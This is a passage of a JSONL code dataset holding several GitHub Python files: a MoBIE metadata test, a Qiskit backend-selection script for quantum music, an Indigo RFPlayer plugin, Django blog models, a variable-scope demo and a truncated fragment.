source in sources.items():\n source_type, source_data = next(iter(source.items()))\n storage = source_data.get(\"imageData\")\n if storage is None:\n continue\n self.assertIn(new_file_format, storage)\n if new_file_format.startswith(\"bdv\"):\n xml = storage[new_file_format][\"relativePath\"]\n xml_path = os.path.join(dataset_folder, xml)\n self.assertTrue(os.path.exists(xml_path))\n _, ep, bn, _ = parse_s3_xml(xml_path)\n self.assertEqual(ep, service_endpoint)\n self.assertEqual(bn, bucket_name)\n else:\n address = storage[new_file_format][\"s3Address\"]\n self.assertTrue(address.startswith(service_endpoint))\n\n if \"relative\" in dataset_name:\n self.assertTrue(\"/\" + self.dataset_name + \"/\" in address)\n\n proj_metadata = mobie.metadata.read_project_metadata(self.root)\n validate_with_schema(proj_metadata, \"project\")\n\n def _test_remote_metadata(self, file_format):\n from mobie.metadata import add_remote_project_metadata\n self.init_dataset(file_format)\n bucket_name = \"my-bucket\"\n service_endpoint = \"https://s3.embl.de\"\n add_remote_project_metadata(self.root, bucket_name, service_endpoint)\n self._check_remote_metadata(file_format, service_endpoint, bucket_name)\n\n def test_remote_metadata_bdv_n5(self):\n self._test_remote_metadata(\"bdv.n5\")\n\n def test_remote_metadata_ome_zarr(self):\n self._test_remote_metadata(\"ome.zarr\")\n\n @unittest.skipIf(platform == \"win32\", \"CLI does not work on windows\")\n def test_cli(self):\n file_format = \"bdv.n5\"\n self.init_dataset(file_format)\n bucket_name = \"my-bucket\"\n service_endpoint = \"https://s3.embl.de\"\n ret = run([\"mobie.add_remote_metadata\", \"-i\", self.root, \"-b\", bucket_name, \"-s\", service_endpoint])\n self.assertTrue(ret.returncode == 0)\n self._check_remote_metadata(file_format, service_endpoint, bucket_name)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mobie/mobie-utils-python","sub_path":"test/metadata/test_remote_metadata.py","file_name":"test_remote_metadata.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"32909028784","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom qiskit import *\nimport numpy as np\nfrom qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, execute\nfrom qiskit import Aer, IBMQ # import the Aer and IBMQ providers\nfrom qiskit.providers.aer import noise # import Aer noise models\nfrom qiskit.tools.monitor import job_monitor\nfrom RenormalizeProbability import *\n\n\n\n# In[7]:\n\n\ndef ChooseBackEnd(quantumCircuit, backendType=\"statevector_simulator\", qubitsToBeMeasured=range(4), numberShots=4096, noisePresent=False, RealDeviceName=\"ibmq_ourense\",number=12):\n\n if backendType == \"statevector_simulator\":\n backend = Aer.get_backend('statevector_simulator')\n result = execute(quantumCircuit, backend).result()\n probabilityVectors = np.square(np.absolute(result.get_statevector()))\n listForMusic = []\n for k in range(2**len(qubitsToBeMeasured)):\n listForMusic.append(\"%.3f\" % (probabilityVectors[k]))\n\n elif backendType == \"qasm_simulator\":\n if noisePresent == False:\n # no noise\n quantumCircuit.measure(qubitsToBeMeasured, qubitsToBeMeasured)\n print(qubitsToBeMeasured)\n\n backend = Aer.get_backend('qasm_simulator')\n result = execute(quantumCircuit, backend, shots=numberShots).result()\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = 
str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\"%.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n else:\n print(qubitsToBeMeasured)\n quantumCircuit.measure(qubitsToBeMeasured,qubitsToBeMeasured)\n provider=IBMQ.save_account('XXX-YOUR-TOKEN')\n # simulate noise of a real device\n IBMQ.load_account()\n IBMQ.providers()\n\n\n device = IBMQ.get_provider(hub='ibm-q', group='open', project='main').get_backend(RealDeviceName)\n properties = device.properties()\n coupling_map = device.configuration().coupling_map\n\n # Generate an Aer noise model for device\n noise_model = noise.device.basic_device_noise_model(properties)\n basis_gates = noise_model.basis_gates\n\n\n # Perform noisy simulation\n backend = Aer.get_backend('qasm_simulator')\n job_sim = execute(quantumCircuit, backend,\n coupling_map=coupling_map,\n noise_model=noise_model,\n basis_gates=basis_gates)\n result = job_sim.result()\n\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\"%.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n elif backendType == \"real_device\":\n # real device\n quantumCircuit.measure(qubitsToBeMeasured,qubitsToBeMeasured)\n provider=IBMQ.save_account('XXX-YOUR-TOKEN')\n # simulate noise of a real device\n IBMQ.load_account()\n IBMQ.providers()\n\n\n device = IBMQ.get_provider(hub='ibm-q', group='open', project='main').get_backend(RealDeviceName)\n job_exp = execute(quantumCircuit, backend=device)\n\n job_monitor(job_exp)\n\n result = job_exp.result()\n\n counts = result.get_counts()\n listForMusic = []\n for i in range(2**len(qubitsToBeMeasured)):\n bitstring = str(bin(i)[2:])\n bitstring = \"0\"*(4-len(bitstring))+bitstring\n if bitstring in counts.keys():\n listForMusic.append(\" %.3f\" % (counts[bitstring]/float(numberShots)))\n else:\n listForMusic.append(\"0.000\")\n\n\n return listForMusic\n\n\n# In[70]:\nif __name__ == \"__main__\":\n # qc = QuantumCircuit(2,2)\n # qc.h(0)\n # qc.x(1)\n #\n # res = ChooseBackEnd(qc,\"qasm_simulator\",200)\n\n\n # In[8]:\n\n\n music = QuantumCircuit(4,4)\n\n desired_vector = np.zeros(np.power(2,4))\n\n desired_vector[1] = 1 / np.sqrt(3)\n desired_vector[3] = 1/np.sqrt(3)\n desired_vector[10] = 1/np.sqrt(3)\n\n music.initialize(desired_vector, range(4))\n\n listForMusic= ChooseBackEnd(music,backendType=\"statevector_simulator\",qubitsToBeMeasured=range(4),\n numberShots=4096, noisePresent=True, RealDeviceName=\"ibmq_16_melbourne\")\n print(listForMusic)\n\n\n# In[ ]:\n","repo_name":"menegolli/Quantum_synth","sub_path":"backends_select.py","file_name":"backends_select.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"71991114801","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n####################\n\nimport sys\nimport time\nfrom datetime import datetime\nimport json\nimport logging\n\nfrom RFPlayer import RFPlayer\nfrom protocols import Blyss, Chacon, Domia, KD101, Oregon, Owl, Parrot, RTS, Visonic, X2D, X10\n\nkCurDevVersCount = 2 # current version of plugin devices\n\n\n################################################################################\nclass Plugin(indigo.PluginBase):\n\n def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):\n indigo.PluginBase.__init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs)\n\n pfmt = logging.Formatter('%(asctime)s.%(msecs)03d\\t[%(levelname)8s] %(name)20s.%(funcName)-25s%(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n self.plugin_file_handler.setFormatter(pfmt)\n\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n\n self.players = {}\n self.sensorDevices = {}\n self.knownDevices = pluginPrefs.get(\"knownDevices\", indigo.Dict())\n self.triggers = {}\n\n self.protocolClasses = {\n \"1\": X10,\n \"2\": Visonic,\n \"3\": Blyss,\n \"4\": Chacon,\n \"5\": Oregon,\n \"6\": Domia,\n \"7\": Owl,\n \"8\": X2D,\n \"9\": RTS,\n \"10\": KD101,\n \"11\": Parrot\n }\n\n def startup(self):\n self.logger.info(\"Starting RFPlayer\")\n\n def shutdown(self):\n indigo.activePlugin.pluginPrefs[\"knownDevices\"] = self.knownDevices\n self.logger.info(\"Shutting down RFPlayer\")\n\n def runConcurrentThread(self):\n\n try:\n while True:\n for playerID, player in self.players.items():\n if player.connected:\n playerFrame = player.poll()\n else:\n playerFrame = None\n\n if playerFrame:\n indigo.devices[playerID].updateStateOnServer(key='playerStatus', value='Running')\n indigo.devices[playerID].updateStateImageOnServer(indigo.kStateImageSel.SensorOn)\n if 'systemStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: systemStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: systemStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n stateList = [\n {'key': 'firmwareVers', 'value': playerFrame['systemStatus']['info'][0]['v']}\n ]\n self.logger.threaddebug(f'{player.device.name}: Updating states on server: {stateList}')\n indigo.devices[playerID].updateStatesOnServer(stateList)\n\n elif 'radioStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: radioStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: radioStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n stateList = [\n {'key': 'lowBandFreq',\n 'value': playerFrame['radioStatus']['band'][0]['i'][0]['v'] + ' - ' + playerFrame['radioStatus']['band'][0]['i'][0][\n 'c']},\n {'key': 'highBandFreq',\n 'value': playerFrame['radioStatus']['band'][1]['i'][0]['v'] + ' - ' + playerFrame['radioStatus']['band'][1]['i'][0][\n 'c']}\n ]\n self.logger.threaddebug(f'{player.device.name}: Updating states on server: {stateList}')\n indigo.devices[playerID].updateStatesOnServer(stateList)\n\n elif 'parrotStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: parrotStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: parrotStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'transcoderStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: transcoderStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: transcoderStatus 
playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'alarmStatus' in playerFrame:\n self.logger.debug(f\"{player.device.name}: alarmStatus frame received\")\n self.logger.threaddebug(\n f\"{player.device.name}: alarmStatus playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n elif 'frame' in playerFrame: # async frame. Find a device to handle it\n\n try:\n protocol = playerFrame['frame']['header']['protocol']\n if protocol in self.protocolClasses:\n devAddress = self.protocolClasses[protocol].frameCheck(player.device, playerFrame['frame'], self.knownDevices)\n\n if devAddress in self.sensorDevices:\n self.sensorDevices[devAddress].handler(playerFrame['frame'], self.knownDevices)\n\n else:\n self.logger.threaddebug(\n f\"{player.device.name}: Frame from {devAddress}, known and not configured. Ignoring.\")\n\n else:\n self.logger.debug(f\"{player.device.name}: Unknown protocol:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n except Exception as e:\n self.logger.debug(\n f\"{player.device.name}: Frame decode error:{str(e)}\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n else:\n self.logger.debug(f\"{player.device.name}: Unknown playerFrame:\\n{json.dumps(playerFrame, indent=4, sort_keys=True)}\")\n\n self.sleep(0.1)\n\n except self.StopThread:\n for playerID, player in self.players.items():\n player.stop()\n\n ########################################\n # Plugin Preference Methods\n ########################################\n\n def validatePrefsConfigUi(self, valuesDict):\n errorDict = indigo.Dict()\n\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n\n if len(errorDict) > 0:\n return False, valuesDict, errorDict\n return True, valuesDict\n\n def closedPrefsConfigUi(self, valuesDict, userCancelled):\n if not userCancelled:\n self.logLevel = int(self.pluginPrefs.get(\"logLevel\", logging.INFO))\n self.indigo_log_handler.setLevel(self.logLevel)\n self.logger.debug(f\"RFPlayer logLevel = {self.logLevel}\")\n\n ########################################\n # Device Management Methods\n ########################################\n\n def didDeviceCommPropertyChange(self, origDev, newDev): # noqa\n if newDev.deviceTypeId == \"RFPlayer\":\n if origDev.pluginProps.get('serialPort', None) != newDev.pluginProps.get('serialPort', None):\n return True\n return False\n\n def deviceStartComm(self, device):\n\n self.logger.debug(f\"{device.name}: Starting Device\")\n\n instanceVers = int(device.pluginProps.get('devVersCount', 0))\n if instanceVers == kCurDevVersCount:\n self.logger.threaddebug(f\"{device.name}: Device is current version: {instanceVers:d}\")\n elif instanceVers < kCurDevVersCount:\n newProps = device.pluginProps\n newProps[\"devVersCount\"] = kCurDevVersCount\n device.replacePluginPropsOnServer(newProps)\n self.logger.debug(f\"{device.name}: Updated device version: {instanceVers:d} -> {kCurDevVersCount:d}\")\n else:\n self.logger.warning(f\"{device.name}: Invalid device version: {instanceVers:d}\")\n\n self.logger.threaddebug(f\"{device.name}: Starting Device: {device}\")\n\n if device.deviceTypeId == \"RFPlayer\":\n serialPort = device.pluginProps.get('serialPort', \"\")\n baudRate = int(device.pluginProps.get('baudRate', 0))\n player = RFPlayer(self, device)\n if player.start(serialPort, baudRate):\n self.players[device.id] = player\n device.updateStateOnServer(key='playerStatus', value='Starting')\n 
device.updateStateImageOnServer(indigo.kStateImageSel.SensorOff)\n else:\n device.updateStateOnServer(key='playerStatus', value='Error')\n device.updateStateImageOnServer(indigo.kStateImageSel.SensorTripped)\n\n elif device.deviceTypeId == \"discoveredDevice\":\n address = device.pluginProps.get('address', \"\")\n protocol = self.knownDevices[address]['protocol']\n self.sensorDevices[address] = (self.protocolClasses[protocol])(device, self.knownDevices)\n\n elif device.deviceTypeId == \"parrotDevice\":\n address = device.pluginProps.get('address', \"\")\n self.sensorDevices[address] = Parrot(device, self.knownDevices)\n\n elif device.deviceTypeId == \"x10Device\":\n address = device.pluginProps.get('address', \"\")\n self.sensorDevices[address] = X10(device, self.knownDevices)\n\n else:\n self.logger.warning(f\"{device.name}: Invalid device type: {device.deviceTypeId}\")\n\n self.logger.debug(f\"{device.name}: deviceStartComm complete, sensorDevices[] =\")\n for key, sensor in self.sensorDevices.items():\n self.logger.debug(f\"\\tkey = {key}, sensor.name = {sensor.device.name}, sensor.id = {sensor.device.id:d}\")\n\n def deviceStopComm(self, device):\n self.logger.debug(f\"{device.name}: Stopping Device\")\n if device.deviceTypeId == \"RFPlayer\":\n device.updateStateOnServer(key='playerStatus', value='Stopping')\n device.updateStateImageOnServer(indigo.kStateImageSel.SensorOff)\n player = self.players[device.id]\n player.stop()\n del self.players[device.id]\n else:\n address = device.pluginProps.get('address', \"\")\n try:\n del self.sensorDevices[address]\n except (Exception,):\n pass\n\n def deviceDeleted(self, device):\n indigo.PluginBase.deviceDeleted(self, device)\n\n if device.address:\n try:\n devices = self.knownDevices[device.address]['devices']\n devices.remove(device.id)\n self.knownDevices.setitem_in_item(device.address, 'devices', devices)\n self.knownDevices.setitem_in_item(device.address, 'status', \"Available\")\n self.logger.debug(f\"deviceDeleted: {device.name} ({device.id})\")\n except Exception as e:\n self.logger.error(f\"deviceDeleted error, {device.name}: {str(e)}\")\n\n ########################################\n\n def validateDeviceConfigUi(self, valuesDict, typeId, devId): # noqa\n if typeId == \"x10Device\":\n valuesDict['address'] = f\"X10-{valuesDict['houseCode']}{valuesDict['unitCode']}\"\n elif typeId == \"parrotDevice\":\n valuesDict['address'] = f\"PARROT-{valuesDict['houseCode']}{valuesDict['unitCode']}\"\n return True, valuesDict\n\n def closedDeviceConfigUi(self, valuesDict, userCancelled, typeId, devId):\n return\n\n # return a list of all \"Available\" devices (not associated with an Indigo device)\n\n def availableDeviceList(self, filter=\"\", valuesDict=None, typeId=\"\", targetId=0):\n retList = []\n for address, data in sorted(self.knownDevices.items()):\n if data['status'] == 'Available':\n retList.append((address, f\"{address}: {data['description']}\"))\n\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n # return a list of all \"Active\" devices of a specific type\n\n def activeDeviceList(self, filter=\"\", valuesDict=None, typeId=\"discoveredDevice\", targetId=0):\n retList = []\n for address, data in sorted(self.knownDevices.items()):\n if data['status'] == 'Active' and (filter in address):\n retList.append((address, f\"{address}: {data['description']}\"))\n\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n ########################################\n\n def triggerStartProcessing(self, trigger):\n self.logger.debug(f\"Adding 
Trigger {trigger.name} ({trigger.id:d})\")\n assert trigger.id not in self.triggers\n self.triggers[trigger.id] = trigger\n\n def triggerStopProcessing(self, trigger):\n self.logger.debug(f\"Removing Trigger {trigger.name} ({trigger.id:d})\")\n assert trigger.id in self.triggers\n del self.triggers[trigger.id]\n\n def triggerCheck(self, device):\n self.logger.threaddebug(f\"Checking Triggers for Device {device.name} ({device.id:d})\")\n\n for triggerId, trigger in sorted(self.triggers.items()):\n self.logger.threaddebug(f\"\\tChecking Trigger {trigger.name} ({trigger.id:d}), {trigger.pluginTypeId}\")\n\n if trigger.pluginProps[\"sensorID\"] != str(device.id):\n self.logger.threaddebug(f\"\\t\\tSkipping Trigger {trigger.name} ({trigger.id}), wrong device: {device.id}\")\n else:\n if trigger.pluginTypeId == \"sensorFault\":\n if device.states[\"faultCode\"]: # trigger if faultCode is not None\n self.logger.debug(f\"Executing Trigger {trigger.name} ({trigger.id})\")\n indigo.trigger.execute(trigger)\n else:\n self.logger.debug(f\"\\tNo Match for Trigger {trigger.name} ({trigger.id:d})\")\n else:\n self.logger.threaddebug(f\"\\tUnknown Trigger Type {trigger.name} ({trigger.id:d}), {trigger.pluginTypeId}\")\n\n ########################################\n # Control Action callbacks\n ########################################\n\n def actionControlUniversal(self, action, dev):\n if action.deviceAction == indigo.kUniversalAction.RequestStatus:\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n sensor.requestStatus(player)\n\n def actionControlSensor(self, action, dev):\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n\n self.logger.debug(f\"actionControlSensor: sensor = {sensor}, player = {player}, action = {action}\")\n\n if action.sensorAction == indigo.kDeviceAction.TurnOn:\n sendSuccess = sensor.turnOn(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", True)\n else:\n self.logger.error(f\"send '{dev.name}' 'On' failed\")\n\n elif action.sensorAction == indigo.kDeviceAction.TurnOff:\n sendSuccess = sensor.turnOff(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", False)\n else:\n self.logger.error(f\"send '{dev.name}' 'Off' failed\")\n\n else:\n self.logger.warning(f\"Unimplemented command in actionControlSensor: '{dev.name}' -> {action.sensorAction}\")\n\n def actionControlDevice(self, action, dev):\n sensor = self.sensorDevices[dev.address]\n player = self.players[sensor.player.id]\n\n self.logger.debug(f\"actionControlDevice: sensor = {sensor}, player = {player}, action = {action}\")\n\n if action.deviceAction == indigo.kDeviceAction.TurnOn:\n sendSuccess = sensor.turnOn(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", True)\n else:\n self.logger.error(f\"send '{dev.name}' 'On' failed\")\n\n elif action.deviceAction == indigo.kDeviceAction.TurnOff:\n sendSuccess = sensor.turnOff(player)\n if sendSuccess:\n dev.updateStateOnServer(\"onOffState\", False)\n else:\n self.logger.error(f\"send '{dev.name}' 'Off' failed\")\n\n else:\n self.logger.warning(f\"Unimplemented command in actionControlDevice: '{dev.name}' -> {action.deviceAction}\")\n\n ########################################\n # Plugin Actions object callbacks\n ########################################\n\n def validateActionConfigUi(self, valuesDict, typeId, devId): # noqa\n errorsDict = indigo.Dict()\n\n if len(errorsDict) > 0:\n return False, valuesDict, errorsDict\n return True, valuesDict\n\n def 
sendCommandAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n command = indigo.activePlugin.substitute(pluginAction.props[\"textString\"])\n\n try:\n self.logger.debug(f\"sendCommandAction command '{command}' to {playerDevice.name}\")\n player.sendRawCommand(command)\n except Exception as e:\n self.logger.exception(f\"sendCommandAction error: {e}\")\n\n def sendRTSMyCommand(self, pluginAction, callerWaitingForResult):\n\n sensorDevice = pluginAction.props[\"device\"]\n sensor = self.sensorDevices[sensorDevice]\n player = self.players[sensor.player.id]\n try:\n self.logger.debug(f\"sendRTSMyCommand to {sensorDevice} via {player.device.name}\")\n sensor.sendMyCommand(player)\n except Exception as e:\n self.logger.exception(f\"sendRTSMyCommand error: {e}\")\n\n def sendX10CommandAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n command = pluginAction.props[\"command\"]\n houseCode = pluginAction.props[\"houseCode\"]\n unitCode = pluginAction.props[\"unitCode\"]\n\n if command == \"DIM\":\n brightness = pluginAction.props[\"brightness\"]\n cmdString = f\"DIM {houseCode}{unitCode} X10 %{brightness}\"\n else:\n cmdString = f\"{command} {houseCode}{unitCode} X10\"\n\n try:\n self.logger.debug(f\"sendX10CommandAction command '{cmdString}' to {playerDevice.name}\")\n player.sendRawCommand(cmdString)\n except Exception as e:\n self.logger.exception(f\"sendX10CommandAction error: {e}\")\n\n def setFrequencyAction(self, pluginAction, playerDevice, callerWaitingForResult):\n\n player = self.players[playerDevice.id]\n band = pluginAction.props[\"freqBand\"]\n lowBand = pluginAction.props[\"lowBand\"]\n highBand = pluginAction.props[\"highBand\"]\n\n if band == \"H\":\n command = \"FREQ H \" + highBand\n elif band == \"L\":\n command = \"FREQ L \" + lowBand\n else:\n self.logger.warning(f\"setFrequencyAction: Unknown band '{band}'\")\n return\n\n try:\n self.logger.debug(f\"setFrequencyAction for {playerDevice.name}, band = {band}, lowBand = {lowBand}, highBand = {highBand} \")\n player.sendRawCommand(command)\n player.sendRawCommand(\"STATUS RADIO JSON\")\n except Exception as e:\n self.logger.exception(f\"setFrequencyAction error: {str(e)}\")\n\n ########################################\n # Menu Methods\n ########################################\n\n # doesn't do anything, just needed to force other menus to dynamically refresh\n def menuChanged(self, valuesDict, typeId, devId): # noqa\n return valuesDict\n\n def dumpKnownDevices(self):\n self.logger.info(f\"Known device list:\\n{self.knownDevices}\")\n\n def purgeKnownDevices(self):\n self.logger.info(\"Purging Known device list...\")\n for address, data in self.knownDevices.items():\n if data['status'] == 'Available':\n self.logger.info(f\"\\t{address}\")\n del self.knownDevices[address]\n\n def sendCommandMenu(self, valuesDict, typeId):\n try:\n deviceId = int(valuesDict[\"targetDevice\"])\n except (Exception,):\n self.logger.error(\"Bad Device specified for Send Command operation\")\n return False\n\n try:\n textString = valuesDict[\"textString\"]\n except (Exception,):\n self.logger.error(\"Bad text string specified for Send Command operation\")\n return False\n\n player = self.players[deviceId]\n command = indigo.activePlugin.substitute(textString)\n\n try:\n self.logger.debug(f\"sendCommandMenu command '{command}' to {indigo.devices[deviceId].name}\")\n player.sendRawCommand(command)\n except Exception as e:\n 
self.logger.exception(f\"sendCommandMenu error: {e}\")\n\n return True\n\n @staticmethod\n def pickSensor(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId != \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n @staticmethod\n def pickPlayer(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId == \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n @staticmethod\n def pickPlayerDevice(filter=None, valuesDict=None, typeId=0, targetId=0):\n retList = []\n for device in indigo.devices.iter(\"self\"):\n if device.deviceTypeId == \"RFPlayer\":\n retList.append((device.id, device.name))\n retList.sort(key=lambda tup: tup[1])\n return retList\n\n def getRFBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps[u'playerModel']\n self.logger.debug(f\"getRFBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"H\", \"310/315MHz Band\"), (\"L\", \"433Mhz Band\")]\n elif playerType == \"EU\":\n return [(\"H\", \"868MHz Band\"), (\"L\", \"433Mhz Band\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getRFBands\")\n return None\n\n def getHighBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps['playerModel']\n self.logger.debug(f\"getHighBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"0\", \"Off\"), (\"310000\", \"310MHz - X10 RF\"), (\"315000\", \"315MHz - Visonic\")]\n elif playerType == \"EU\":\n return [(\"0\", \"Off\"), (\"868350\", \"868.350MHz\"), (\"868950\", \"868.950MHz\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getHighBands\")\n return None\n\n def getLowBands(self, filter=None, valuesDict=None, typeId=0, targetId=0):\n rfPlayer = indigo.devices[targetId]\n playerType = rfPlayer.pluginProps[u'playerModel']\n self.logger.debug(f\"getLowBands for {rfPlayer.name} ({playerType})\")\n\n if playerType == \"US\":\n return [(\"0\", \"Off\"), (\"433420\", \"433.420Mhz - Somfy RTS\"), (\"433920\", \"433.920Mhz - Most 433MHz devices\")]\n elif playerType == \"EU\":\n return [(\"0\", \"Off\"), (\"433420\", \"433.420Mhz\"), (\"433920\", \"433.920Mhz\")]\n\n self.logger.error(f\"Unknown playerType = {playerType} in getLowBands\")\n return None\n","repo_name":"FlyingDiver/Indigo-RFPlayer","sub_path":"RFPlayer.indigoPlugin/Contents/Server Plugin/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":24216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17775452007","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models import Avg\nfrom django.contrib.auth import get_user_model\n\nfrom core_apps.common.models import TimeStampedUUIDModel\nfrom core_apps.ratings.models import Rating\n\nfrom .read_time_engine import ArticleReadEngine\n\nfrom autoslug import AutoSlugField\n\nUser = get_user_model()\n\ndef upload_to(instance, filename):\n filename = str(instance.id) + filename\n return 'banner_images/{filename}'.format(filename=filename)\n\nclass Tag(TimeStampedUUIDModel):\n tag = 
models.CharField(max_length=20, blank=True)\n slug = AutoSlugField(populate_from=\"tag\", db_index=True, unique=True)\n\n class Meta:\n verbose_name_plural = \"Tags\"\n \n def __str__(self):\n return self.tag\n \nclass Article(TimeStampedUUIDModel):\n author = models.ForeignKey(User, verbose_name=_(\"Author\"), related_name=\"articles\", on_delete=models.CASCADE)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=50)\n\n slug = AutoSlugField(populate_from=\"title\", always_update=True, unique=True)\n \n description = models.CharField(verbose_name=_(\"Description\"), max_length=150)\n\n body = models.TextField(verbose_name=_(\"Content\"))\n\n banner_image = models.ImageField(verbose_name=_(\"Banner\"), default=\"/banner_default.jpg\", upload_to=upload_to)\n\n tags = models.ManyToManyField(Tag, related_name=\"articles\", blank=True)\n\n views = models.IntegerField(verbose_name=_(\"Article's views\"), default=0)\n\n def __str__(self) -> str:\n return f\"{self.author}'s article\"\n \n def list_of_tags(self):\n tag_list = [relation.tag for relation in self.tags.all()] # tags.all() gives all Tag objects related to this article\n return tag_list\n \n def article_read_time(self):\n time_to_read = ArticleReadEngine(self) # self is the current article obj\n return time_to_read.get_read_time()\n \n @property\n def get_average_rating(self):\n if Rating.objects.filter(article=self.pkid).exists():\n rating = Rating.objects.filter(article=self.pkid).aggregate(Avg(\"value\")) # aggregate() returns a dict like {'value__avg': ...}\n return round(rating['value__avg'],1) if rating['value__avg'] else 0\n return 0\n\n \nclass ArticleViews(TimeStampedUUIDModel):\n ip = models.CharField(max_length=38, verbose_name=_(\"IP Address\"))\n article = models.ForeignKey(Article, verbose_name=_(\"Views\"), on_delete=models.CASCADE)\n\n def __str__(self) -> str:\n return f\"{self.article.title} has {self.article.views} view(s).\"\n \n class Meta:\n verbose_name = \"Total views on Article\"\n verbose_name_plural = \"Total Article Views\"\n","repo_name":"dev08math/dynamic-blog-api","sub_path":"core_apps/articles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"29037849779","text":"\"\"\"Here we look at variable scope: the global keyword always refers to the\r\nmodule-level (truly global) variable, even inside nested functions.\r\n\"\"\"\r\n\r\n# a = 5\r\n# def func():\r\n# # you have to specify in the function whether the var is global or local; both can't work\r\n# #print(a)\r\n# #a = 23\r\n# global a\r\n# a += 12\r\n# print(a)\r\n#\r\n# func()\r\n# print(a)\r\n\r\ndef ram():\r\n x = 23\r\n def shyam():\r\n global x\r\n x = 32\r\n print(x)\r\n print(x)\r\n shyam()\r\n print(x)\r\nram()\r\nprint(x)","repo_name":"vijendra21vijendra/python","sub_path":"scopethings.py","file_name":"scopethings.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"17487468749","text":"\r\n#Please complete the code using chaos theory, and allow the lambda parameter to be optimized with a possible revision of output quality.\r\n#Certainly! 
